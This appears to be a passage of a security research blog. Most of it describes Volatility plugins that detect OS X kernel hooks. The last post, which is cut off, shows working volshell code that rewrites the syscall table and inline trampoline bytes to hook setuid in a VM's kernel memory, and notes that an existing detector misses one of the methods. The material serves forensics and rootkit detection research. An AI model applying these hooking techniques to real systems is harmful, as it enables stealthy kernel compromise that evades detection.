<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7NwYyJ5DAVeMw8w5ZsyoTWP9_ATUtFbWzg6izMN5HGbGjtROTIsB_oZzXTJndEDi29F-57Tv6ZWydhS9KFnGK7m2dcyYDcTgvtoOsDwjlC0qc-qJQc3ZIkIVBJYP8JKr_HY9xa3z4dSx/s1600/Screen+Shot+2013-07-27+at+11.37.04+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="82" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW7NwYyJ5DAVeMw8w5ZsyoTWP9_ATUtFbWzg6izMN5HGbGjtROTIsB_oZzXTJndEDi29F-57Tv6ZWydhS9KFnGK7m2dcyYDcTgvtoOsDwjlC0qc-qJQc3ZIkIVBJYP8JKr_HY9xa3z4dSx/s320/Screen+Shot+2013-07-27+at+11.37.04+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Regular Handler Disassembly (idt64_debug) </td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNLy0HChYyGDMLa3MZ3wY_QnSqaQS7Br4Za56GlYnJKdk3LT1ui1TDDU5YcwKFrGExn5JKm9nDBXBd6Kxod6nvqWhIICos6jxprr9KO7NIjUR3oLuWIVpjRmBK5V_58VF4x_EfFKxgfvyj/s1600/Screen+Shot+2013-07-27+at+11.37.29+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNLy0HChYyGDMLa3MZ3wY_QnSqaQS7Br4Za56GlYnJKdk3LT1ui1TDDU5YcwKFrGExn5JKm9nDBXBd6Kxod6nvqWhIICos6jxprr9KO7NIjUR3oLuWIVpjRmBK5V_58VF4x_EfFKxgfvyj/s320/Screen+Shot+2013-07-27+at+11.37.29+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Hooked Handler Disassembly (idt64_zero_div)</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXTj1TwuuEyo0UxVNa-gzpJrADo3RqCdtc5dnoYRMCZJA0lXp9QmuBKLHWX6lkhmISxIbGHpMLU4dFHAIUgj6dWBxhni8v8c6milPJPqh83kjYBo8Raqj-J4bOZFbcWuW6nucViI4MavpL/s1600/Screen+Shot+2013-07-27+at+11.00.44+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXTj1TwuuEyo0UxVNa-gzpJrADo3RqCdtc5dnoYRMCZJA0lXp9QmuBKLHWX6lkhmISxIbGHpMLU4dFHAIUgj6dWBxhni8v8c6milPJPqh83kjYBo8Raqj-J4bOZFbcWuW6nucViI4MavpL/s320/Screen+Shot+2013-07-27+at+11.00.44+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">check_idt Results for a Hooked IDT Handler (idt64_zero_div)</td></tr>
</tbody></table>
The screenshot for the check_idt plugin results show that the IDT entry name is known and the descriptor itself appears as unmodified. On the other hand, the plugin also shows that the entry's handler has been inlined.<br />
<br />
Are there any other tools that detect IDT modifications for OS X? Yes and no. @osxreverser had <a href="http://reverse.put.as/2012/01/10/a-mac-os-x-port-of-phracks-checkidt-util-by-kad-or-another-way-to-retrieve-sysent-address/" target="_blank">modified</a> checkidt, a tool <a href="http://www.phrack.org/issues.html?issue=59&id=4" target="_blank">originally written</a> for Linux, so it could run on OS X. While the tool can detect a modified descriptor, it can't detect an inlined handler. Also the tool has some difficulty running on x64 systems due to issues with /dev/kmem (it works great on x86).<br />
<h2>
Conclusion</h2>
<div>
In this post I have shown two ways to hook IDT and detect these hooks using my <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_idt.py" target="_blank">check_idt</a> plugin. Volatility again has proven to be a flexible tool in developing POC attacks and detecting them. One interesting note: IDT is protected on <a href="http://msdn.microsoft.com/en-us/library/windows/hardware/gg487350.aspx" target="_blank">x64 Windows</a> systems and hooking will generate a bug check and shut down the system. Maybe OS X needs to do some catching up? </div>siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-51842301561855902532013-07-13T22:20:00.002-07:002013-07-15T10:41:18.015-07:00Back to Defense: Finding Hooks in OS X with Volatility<h2>
Summary</h2>
<div>
In my <a href="http://siliconblade.blogspot.com/2013/07/offensive-volatility-messing-with-os-x.html" target="_blank">previous post</a> I discussed how to mess with the OS X syscall table through direct syscall table modification, syscall function inlining, and patching the syscall handler. As I promised, I'll be providing a plugin to find the mess! The code for the check_hooks plugin can be found at <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py" target="_blank">github</a> and it incorporates existing detections for the sake of completeness. So let's go through the scenarios discussed earlier.<br />
<br />
<a name='more'></a><br /></div>
<h2>
<a href="http://www.blogger.com/blogger.g?blogID=4784284837399262626&pli=1" name="more"></a></h2>
<h2>
Syscall Interception by Directly Modifying the Syscall Table</h2>
<b>- Replacing a Syscall with Another Syscall</b><br />
Detecting a duplicate syscall entry is straight forward: keep track of the syscalls as they are listed and see if a duplicate appears. The example I'll be using is discussed in my previous post, which was replacing the setuid function with the exit function:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEog8iRgDTXaT0R_3XS1Z1NBPSyiCJFrHp_BSPQrWsDLJkEgGffRsKgFulwMrao3HOgRLtiZptBtCSWTcaQWCmQmIKqSguYfHSRlcwh26SH0g10xAlaoZ7m7inL5Hmqt1cosCE4L75QK7/s1600/Screen+Shot+2013-07-13+at+9.15.18+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="19" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTEog8iRgDTXaT0R_3XS1Z1NBPSyiCJFrHp_BSPQrWsDLJkEgGffRsKgFulwMrao3HOgRLtiZptBtCSWTcaQWCmQmIKqSguYfHSRlcwh26SH0g10xAlaoZ7m7inL5Hmqt1cosCE4L75QK7/s320/Screen+Shot+2013-07-13+at+9.15.18+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Duplicate syscall function detection</td></tr>
</tbody></table>
<br />
<b>- Replacing a Syscall with a DTrace hook</b><br />
This one is an easy catch as well. I just check the syscall name to if contains the word 'dtrace' to detect syscall and mach_trap <a href="http://siliconblade.blogspot.com/2013/05/checkdtrace-volatility-plugin-arises.html" target="_blank">DTrace hooks</a>.<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdWdWPMrIcBnIqp4Esife85L8DgbNoZRlCDk7fIvxaguIV9R1qlXXAt4vdQUH0e5nJg-Tv3FMrTOwLevcJFWXFFjYwWmXPsCgyqBwzUI_sKjqYs2ZxXWzGbDS7iYMH4_DVo0AIkRJKrp9q/s1600/Screen+Shot+2013-07-13+at+9.19.15+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="15" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdWdWPMrIcBnIqp4Esife85L8DgbNoZRlCDk7fIvxaguIV9R1qlXXAt4vdQUH0e5nJg-Tv3FMrTOwLevcJFWXFFjYwWmXPsCgyqBwzUI_sKjqYs2ZxXWzGbDS7iYMH4_DVo0AIkRJKrp9q/s320/Screen+Shot+2013-07-13+at+9.19.15+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DTrace syscall hooking detection</td></tr>
</tbody></table>
<b><br />- Replacing a Syscall with an External Function</b><br />
For this case I'll be using a Rubilyn infected memory sample provided by <a href="https://twitter.com/osxreverser" target="_blank">@osxreverser</a>, which can be found <a href="https://www.dropbox.com/s/8j4j8fuwniv7tm8/Mac%20OS%20X%2010.7%2064-bit-800c275a.vmem.tar.bz2" target="_blank">here</a>. This is not a new detection, but it's included for the sake of completeness. As a new feature to this detection, I've included the hook's destination <a href="https://developer.apple.com/library/mac/#documentation/Darwin/Conceptual/KEXTConcept/KEXTConceptIntro/introduction.html" target="_blank">kext (kernel extension)</a> in the output (<a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L132" target="_blank">check_hooks/findKextWithAddress</a> function). As pointed out in the <a href="http://volatility-labs.blogspot.com/2013/06/movp-ii-45-mac-volatility-vs-rubilyn.html" target="_blank">Volatility Blog</a>, this rootkit hooks three functions:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG6UKoLK0iKpcpsi7ACxuxPIFXQ1r9ypnUS7-_JzhurwmC8sHUWsWNyXDQUqNCr5m0KuW-ykbFxP0kTOiLpUTt7xU6WBOkBTOOo6AsKrfRlBgT8pOiFj-SuocezyGX3Txp-C7tqHEvjAi7/s1600/Screen+Shot+2013-07-13+at+9.25.38+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG6UKoLK0iKpcpsi7ACxuxPIFXQ1r9ypnUS7-_JzhurwmC8sHUWsWNyXDQUqNCr5m0KuW-ykbFxP0kTOiLpUTt7xU6WBOkBTOOo6AsKrfRlBgT8pOiFj-SuocezyGX3Txp-C7tqHEvjAi7/s320/Screen+Shot+2013-07-13+at+9.25.38+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Rubilyn hook detection</td></tr>
</tbody></table>
<h2>
</h2>
<h2>
Syscall Function Interception or Inlining</h2>
<div>
Currently it is not possible to detect an inlined syscall function with the Mac side of the Volatility Framework because it only checks for the direct modification of the syscall table. To be able to detect function inlining, I applied two techniques:</div>
<div>
<ol>
<li>Check the function's prologue for modification, which will be useful later as well</li>
<li>Check for the function's flow control</li>
</ol>
<div>
Looking at the syscall function prologues, it can be seen that they contain the following:</div>
</div>
<pre><span style="font-size: x-small;">For x86:
PUSH RBP
MOV EBP, ESP
For x64:
PUSH RBP
MOV RBP, RSP</span></pre>
The volshell script I used to see this is below:<br />
<pre><span style="font-size: x-small;">#get sysent addresses for exit and setuid
nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
sysents = obj.Object(theType = "Array", offset = self.addrspace.profile.get_symbol("_sysent"), vm = self.addrspace, count = nsysent, targetType = "sysent")
for (i, sysent) in enumerate(sysents):
tgt_addr = sysent.sy_call.v()
print self.addrspace.profile.get_symbol_by_address("kernel", tgt_addr)
buf = self.addrspace.read(tgt_addr, 4)
for op in distorm3.Decompose(tgt_addr, buf, distorm3.Decode64Bits):
print op</span>
</pre>
<br />
The <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L216" target="_blank">check_hooks/isPrologInlined</a> function checks to see if the prologue conforms with these known instructions.<br />
<br />
The <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L254" target="_blank">check_hooks/isInlined</a> function, on the other hand, looks for calls, jumps or push/ret instructions that end up outside the kernel address space.<br />
<br />
If we use the check_hooks plugin on a memory sample with the inlined setuid syscall function that trampolines into the exit syscall function we get the following:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMDir4qGC6_-a-9-7lUU-4_CsUs7V-WUN73Yhrl2kjTz0UZ1_vPGcgEQuvjXgxYfOFHSzv1-6QmnVhgK_-qqzqQ3-hpAy1LYcGuiAR4Abuo9gkrGP8F91nVZwC31qWCAHplXtDpXS4DDzD/s1600/Screen+Shot+2013-07-13+at+9.47.55+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="16" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMDir4qGC6_-a-9-7lUU-4_CsUs7V-WUN73Yhrl2kjTz0UZ1_vPGcgEQuvjXgxYfOFHSzv1-6QmnVhgK_-qqzqQ3-hpAy1LYcGuiAR4Abuo9gkrGP8F91nVZwC31qWCAHplXtDpXS4DDzD/s320/Screen+Shot+2013-07-13+at+9.47.55+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Inlinded Function (setuid) Detection</td></tr>
</tbody></table>
This example is interesting because it wouldn't be picked up by the isInlined function since the hook is within the kernel address space, but luckily I'm checking for function prologue modification, which flagged it.<br />
<br />
Another example of syscall inline hooking is <a href="http://siliconblade.blogspot.com/2013/05/checkdtrace-volatility-plugin-arises.html" target="_blank">DTrace fbt hooking</a>, which modifies the hooked function's prologue. The check_hooks plugin will detect the DTrace fbt probe that is monitoring the getdirentries64 syscall function as well:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjF4TpH1Z__NEJcoPPWX78gibvpN91k_c7tJGlfr8p-TAbu4x6aW2R6ua_SE_s2TwmtQ5ibmREUOQyyurNbvuPSEzrA2TOfsT5gFFrB7kUHbkkUrSz0vEuNXcmY5b7IA-xy7_1pDOYaT_9/s1600/Screen+Shot+2013-07-13+at+9.56.44+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="15" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjF4TpH1Z__NEJcoPPWX78gibvpN91k_c7tJGlfr8p-TAbu4x6aW2R6ua_SE_s2TwmtQ5ibmREUOQyyurNbvuPSEzrA2TOfsT5gFFrB7kUHbkkUrSz0vEuNXcmY5b7IA-xy7_1pDOYaT_9/s320/Screen+Shot+2013-07-13+at+9.56.44+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DTrace fbt probe detection</td></tr>
</tbody></table>
<h2>
</h2>
<h2>
Patched Syscall Handler or Shadow Syscall Table</h2>
<div>
The shadowing of the syscall table is a technique that hides the attacker's modifications to the syscall table by creating a copy of it to modify and by keeping the original untouched as discussed in my <a href="http://siliconblade.blogspot.com/2013/07/offensive-volatility-messing-with-os-x.html" target="_blank">previous post</a>.<br />
<br />
The detection implemented in the <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L153" target="_blank">check_hooks/isSyscallShadowed</a> function works as follows:<br />
<br />
<ol>
<li>Check functions known to have references to the syscall table. In this case the functions are unix_syscall_return, unix_syscall64, unix_syscall.</li>
<li>Disassemble them to find the syscall table references.</li>
<li>Obtain the references in the function and compare to the address in the symbols table.</li>
</ol>
<div>
After running the attack code sample for the shadow syscall table attack, I ran the check_hooks plugin against the memory sample and received the following output that included hits for the shadow syscall table:</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyKSewmdMH4Tylluq68_GCNjqkIZeMlHzte688DRMww_zqR9lPUffNu0kQEdQTjqVp03xqNLCLjK5xAmszbLPXqwSGXfxJMFwslwQz-AEtKz-lrOxaPYbxT52x6FCFknr78JrYt66d70x8/s1600/Screen+Shot+2013-07-13+at+10.30.26+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyKSewmdMH4Tylluq68_GCNjqkIZeMlHzte688DRMww_zqR9lPUffNu0kQEdQTjqVp03xqNLCLjK5xAmszbLPXqwSGXfxJMFwslwQz-AEtKz-lrOxaPYbxT52x6FCFknr78JrYt66d70x8/s320/Screen+Shot+2013-07-13+at+10.30.26+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Shadow syscall table detection</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
It looks like I have covered the detection of the examples in my previous post, but I'm not done!</div>
</div>
<h2>
</h2>
<h2>
Bonus! Scanning Functions in Kernel/Kext Symbol Tables</h2>
<div>
Now that I have the tools to detect function modifications, I decided to check on the functions in the rest of the kernel and kernel extensions. To be able to accomplish this task, I had to obtain the list of symbols per kernel or kext since the Volatility Framework is currently not able to list kernel or kext symbols from a memory sample.<br />
<br />
I followed these steps in the <a href="https://github.com/siliconblade/volatility/blob/master/mac/check_hooks.py#L43" target="_blank">check_hooks/getKextSymbols</a> function:<br />
<br />
<ol>
<li>Get the Mach-o header (e.g. mach_header_64) to get the start of segments.</li>
<li>Locate the __LINKEDIT segment to get the address for the list of symbols represented as nlist_64 structs, symbols file size and offsets.</li>
<li>Locate the the segment with the LC_SYMTAB command to get the symbols and strings offsets, which will be used to...</li>
<li>Calculate the location of the symbols in __LINKEDIT.</li>
<li>Once we know the exact address, loop through the nlist structs to get the symbols.</li>
<li>Also find the number of the __TEXT segment's __text section number, which will be used to filter out symbols. According to <a href="https://developer.apple.com/library/mac/#documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html" target="_blank">Apple's documentation</a> the compiler places only executable code in this section. </li>
</ol>
<div>
The nlist structs have a member called n_sect, which stores the section number that the symbol's code lives in. This value, in conjunction with the __text section's number helped in narrowing down the list of symbols to mostly functions' symbols. I say mostly because I have seen structures, such as <a href="http://fxr.watson.org/fxr/source/bsd/kern/mach_header.c?v=xnu-792.6.70" target="_blank">_mh_execute_header</a> still listed.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXG525-jxBj5Ju2B-dku7QQ8dxl_BZoKVWZm8D2M1XAUEmgyV-mJ0VW9zVB02LHX5BtZPWmT9FEiqEFJeIKaGy2q-Y-kcpcY8KC5NBCwagr5KIz1Cnw018MfhlR9kv70rIsjiavZdCPP1O/s1600/Screen+Shot+2013-07-13+at+11.09.58+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXG525-jxBj5Ju2B-dku7QQ8dxl_BZoKVWZm8D2M1XAUEmgyV-mJ0VW9zVB02LHX5BtZPWmT9FEiqEFJeIKaGy2q-Y-kcpcY8KC5NBCwagr5KIz1Cnw018MfhlR9kv70rIsjiavZdCPP1O/s320/Screen+Shot+2013-07-13+at+11.09.58+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Some test output for kernel symbols</td></tr>
</tbody></table>
</div>
Next step is to use the addresses obtained form the filtered symbols table to check for hooks.<br />
<br />
Quick note, while syscall functions had identical function prologues, other functions in the symbols table, such as bcopy, have different ones. Therefore, using the isPrologInlined function produces false positives, which left me with using the isInlined function to detect hooks.<br />
<br />
My target for this case is an OS X 10.8.3 VM running <a href="https://github.com/gdbinit/hydra" target="_blank">Hydra</a>, a kernel extension that intercepts a process's creation, suspends it, and communicates it to a userland daemon, which was written by @osxreverser. Hydra <a href="https://github.com/gdbinit/hydra/blob/master/hydra/hydra/hydra.c" target="_blank">inline hooks</a> the function proc_resetregister in order to achieve its first goal. After compiling and loading the kext, I ran the check_hooks plugin with the -K option to only scan the kernel symbols to see what's detected:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_9jx2jCE2N0y9vlGlVtJZLmzHhjqMnKBRd4hWHv1ulrZIs34KZlvBkl3Quoq-nS1NfF0vj1c6JearEiKic3EgwQcDOE_2HOBtCuj3qEhMwiKWDyAoxBQ9trr5Je9UaHn6rB1udXHFgOf/s1600/Screen+Shot+2013-07-13+at+11.52.10+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="16" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_9jx2jCE2N0y9vlGlVtJZLmzHhjqMnKBRd4hWHv1ulrZIs34KZlvBkl3Quoq-nS1NfF0vj1c6JearEiKic3EgwQcDOE_2HOBtCuj3qEhMwiKWDyAoxBQ9trr5Je9UaHn6rB1udXHFgOf/s320/Screen+Shot+2013-07-13+at+11.52.10+PM.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Hydra hook detection</td></tr>
</tbody></table>
As seen in the screenshot, the plugin detects the function proc_resetregister as inline hooked and shows that the destination of the hook is in the 'put.as.hydra' kext. The other plugin specific option -X will scan all kexts' symbols, if available, for hooking.<br />
<br />
Note: Most testing was performed on OS X 10.7.5 x64 and 10.8.3 x64. Feedback about outcomes on other OS X versions would be appreciated.<br />
<h2>
</h2>
<h2>
Conclusion</h2>
<div>
With the check_hooks plugin, now it's possible to detect hooked functions in the syscall table and kext symbols besides a shadow syscall table. While this is great, it doesn't end here. In my next post I'll be exploring OS X IDT hooks so stay tuned!</div>
siliconbladehttp://www.blogger.com/profile/15072042953000392149noreply@blogger.com0tag:blogger.com,1999:blog-4784284837399262626.post-54509115006637761652013-07-02T21:54:00.001-07:002013-07-22T08:29:02.832-07:00Offensive Volatility: Messing with the OS X Syscall Table<h2>
Summary</h2>
After taking a brief detour into <a href="http://siliconblade.blogspot.com/2013/06/automated-secure-code-review-anyone.html" target="_blank">reviewing JAVA source code</a> I'm back to OS X and Volatility. In this post I'll be using <a href="https://code.google.com/p/volatility/" target="_blank">the Volatility Framework</a> to alter the OS X syscall table from an offensive perspective rather than using it for detection. To accomplish this, I'll be mimicking techniques used by malware, such as direct syscall table modification, syscall function inlining, patching the syscall handler, and hiding the payload in a binary's segment.<br />
<br />
<a name='more'></a><br />
<h2>
What's a Syscall Table?</h2>
<div>
Generally speaking, the syscall table is an array of function pointers. In UNIX, a system call is part of a defined list of functions that permit a userland process to interact with the kernel. A user process uses a system call to request the kernel to perform operations on its behalf. In <a href="http://en.wikipedia.org/wiki/XNU" target="_blank">XNU</a>, the syscall table is known as "sysent", and is no longer a public symbol, to prevent actions like syscall hooking. The list of entries is defined in the <a href="http://www.opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master" target="_blank">syscall.masters</a> file. Below is the structure of a sysent entry as represented by Volatility:</div>
<div>
<br /></div>
<div>
<pre><span style="font-size: x-small;">'sysent' (40 bytes)
0x0 : sy_narg ['short']
0x2 : sy_resv ['signed char']
0x3 : sy_flags ['signed char']
0x8 : sy_call ['pointer', ['void']]
0x10 : sy_arg_munge32 ['pointer', ['void']]
0x18 : sy_arg_munge64 ['pointer', ['void']]
0x20 : sy_return_type ['int']
0x24 : sy_arg_bytes ['unsigned short']</span>
</pre>
</div>
<br />
The sy_call member of the sysent struct contains the pointer to the syscall function.<br />
<h2>
Preparation</h2>
<div>
I'll be using a VMWare instance of OS X 10.8.3 as a target and Volatility's mac_volshell command with write access to alter the kernel. After firing up the the VM, I issued the following command to drop to the volshell command line (by the way I had to agree to enable write support...).</div>
<div>
<br /></div>
<div>
<pre><span style="font-size: x-small;">$ python vol.py mac_volshell -f ~/Documents/Virtual\ Machines/Mac\ OS\ X\ 10.8\ 64-bit.vmwarevm/Mac\ OS\ X\ 10.8\ 64-bit-af14d5f6.vmem --profile=MacMountainLion_10_8_3_AMDx64 -w
Volatile Systems Volatility Framework 2.3_beta
Write support requested. Please type "Yes, I want to enable write support" below precisely (case-sensitive):
Yes, I want to enable write support</span>
</pre>
</div>
<h2>
Syscall Interception by Directly Modifying the Syscall Table</h2>
A quick and easy example of modifying the syscall table is switching the setuid call with the exit call as explained in this <a href="http://www.phrack.org/issues.html?issue=66&id=16" target="_blank">Phrack article</a>. The code below retrieves the sysent entry addresses for the exit and setuid calls so we know what to modify. Then the sysent objects get instantiated to access their sy_call members, which contain the pointer to the syscall function. Finally, the code overwrites the setuid sysent's syscall function address with the exit sysent's syscall function address.<br />
<br />
<pre><span style="font-size: x-small;">>>> #get sysent addresses for exit and setuid
>>> nsysent = obj.Object("int", offset = self.addrspace.profile.get_symbol("_nsysent"), vm = self.addrspace)
>>> sysents = obj.Object(theType = "Array", offset = self.addrspace.profile.get_symbol("_sysent"), vm = self.addrspace, count = nsysent, targetType = "sysent")
>>> for (i, sysent) in enumerate(sysents):
... if str(self.addrspace.profile.get_symbol_by_address("kernel",sysent.sy_call.v())) == "_setuid":
... "setuid sysent at {0:#10x}".format(sysent.obj_offset)
... "setuid syscall {0:#10x}".format(sysent.sy_call.v())
... if str(self.addrspace.profile.get_symbol_by_address("kernel",sysent.sy_call.v())) == "_exit":
... "exit sysent at {0:#10x}".format(sysent.obj_offset)
... "exit syscall {0:#10x}".format(sysent.sy_call.v())
...
'exit sysent at 0xffffff8006455868'
'exit syscall 0xffffff8006155430'
'setuid sysent at 0xffffff8006455bd8'
'setuid syscall 0xffffff8006160910'
>>> #create sysent objects
>>> s_exit = obj.Object('sysent',offset=0xffffff8006455868,vm=self.addrspace)
>>> s_setuid = obj.Object('sysent',offset=0xffffff8006455bd8,vm=self.addrspace)
>>> #write exit function address to setuid function address
>>> self.addrspace.write(s_setuid.sy_call.obj_offset, struct.pack("<Q", s_exit.sy_call.v()))
True</span></pre>
<br />
After the switch if any program calls setuid, it will be redirected to the exit syscall, and end without issues. This won't be detected by Volatility's <a href="https://code.google.com/p/volatility/wiki/MacCommandReference23#mac_check_syscalls" target="_blank">mac_check_syscalls plugin</a> as 'hooked' as of r3444. Volatility, on the other hand, will detect syscall table modifications that point to functions that are not listed within the symbols table.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCsaRVgqItVKdggm0jJBpBD5Twut6F3YazMXkBgasABTP3ZD4jCBspkGuABZlRCycmkOWBmtywPMk9auo5XYREYOhWyfxGi3GnSV_RNJoy0aOXMbyUZPPCBQx3zN6V-KmzCLqExDgx1A3/s1534/before-after-syscall-mod.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQCsaRVgqItVKdggm0jJBpBD5Twut6F3YazMXkBgasABTP3ZD4jCBspkGuABZlRCycmkOWBmtywPMk9auo5XYREYOhWyfxGi3GnSV_RNJoy0aOXMbyUZPPCBQx3zN6V-KmzCLqExDgx1A3/s320/before-after-syscall-mod.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">mac_check_syscalls output before and after modification</td></tr>
</tbody></table>
<h2>
Syscall Function Interception or Inlining</h2>
For this case I'll be modifying setuid syscall function prologue to add a trampoline into the exit syscall function. The <a href="https://github.com/gdbinit/hydra/blob/master/hydra/hydra/hydra.c" target="_blank">following</a> will be used to modify the function:<br />
<br />
<pre><span style="font-size: x-small;">"\x48\xB8\x00\x00\x00\x00\x00\x00\x00\x00" // mov rax, address
"\xFF\xE0"; // jmp rax</span>
</pre>
<br />
The address place holder will be replaced with the exit syscall address as seen below:<br />
<br />
<pre><span style="font-size: x-small;">>>> buf = "\x48\xB8\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xE0".encode("hex").replace("0000000000000000",struct.pack("<Q",self.addrspace.profile.get_symbol("_exit")).encode('hex'))
>>> buf
'48b83054550780ffffffffe0'
>>> import binascii
>>> self.addrspace.write(self.addrspace.profile.get_symbol("_setuid"),binascii.unhexlify(buf))
True</span>
</pre>
<br />
The function disassembly shows that the modification was successful:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
